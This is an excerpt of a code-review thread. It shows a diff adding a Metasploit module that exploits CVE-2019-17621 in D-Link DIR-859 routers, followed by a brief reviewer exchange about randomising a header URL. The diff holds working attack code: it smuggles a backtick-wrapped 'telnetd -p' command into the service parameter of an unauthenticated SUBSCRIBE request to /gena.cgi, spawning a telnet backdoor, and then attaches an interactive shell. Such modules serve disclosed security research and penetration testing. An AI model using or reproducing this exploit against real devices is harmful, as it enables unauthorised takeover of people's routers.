modules/exploits/linux/upnp/dlink_dir859_subscribe_exec_telnet.rb

```diff
@@ -0,0 +1,143 @@
+        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in 
+        /htdocs/cgibin), which is accessible without credentials.
+      },
+      'Author'      =>
+        [
+          'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
+          'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2019-17621' ],
+          [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
+        ],
+      'DisclosureDate' => 'Dec 24 2019',
+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' =>
+        {
+            'PAYLOAD' => 'cmd/unix/interact' ,
+            'RPORT' => '49152'
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic',	{ } ],
+        ],
+      'DefaultTarget'  => 0
+      ))
+
+    register_advanced_options(
+      [
+        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+      ])
+  end
+
+  def tel_timeout
+    (datastore['TelnetTimeout'] || 10).to_i
+  end
+
+  def banner_timeout
+    (datastore['TelnetBannerTimeout'] || 25).to_i
+  end
+
+  def exploit
+    telnetport = rand(16384) + 32767
+
+    print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
+
+    cmd = "telnetd -p #{telnetport} &"
+
+    #starting the telnetd gives no response
+    request(cmd)
+
+    sleep 0.5
+
+    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
+    ctx = { 'Msf' => framework, 'MsfExploit' => self }
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })
+
+    if sock.nil?
+      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+    end
+
+    add_socket(sock)
+
+    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+    
+    prompt = negotiate_telnet(sock)
+    if prompt.nil?
+      sock.close
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
+    else
+      print_good("#{rhost}:#{rport} - Telnet session successfully established...")
+    end
+
+    handler(sock)
+    if session_created?
+        remove_socket(sock)
+    end
+  end
+
+  def request(cmd)
+
+    uri = "/gena.cgi?service=`#{cmd}`"
+
+    begin
+      res = send_request_raw({
+        'uri'	=> uri,
+        'method' =>	'SUBSCRIBE',
+        'headers' =>
+        {
+                'Callback' => '<http://192.168.0.2:1337/ServiceProxy0>',
```

Comment:
Is the URL important? Can it be safely randomized?

Reply:
>Is the URL important?

More or less. The `Callback` header has to be there, and its value can be something like `<http:///>`

>Can it be safely randomized?

Yes.

Reply:
Done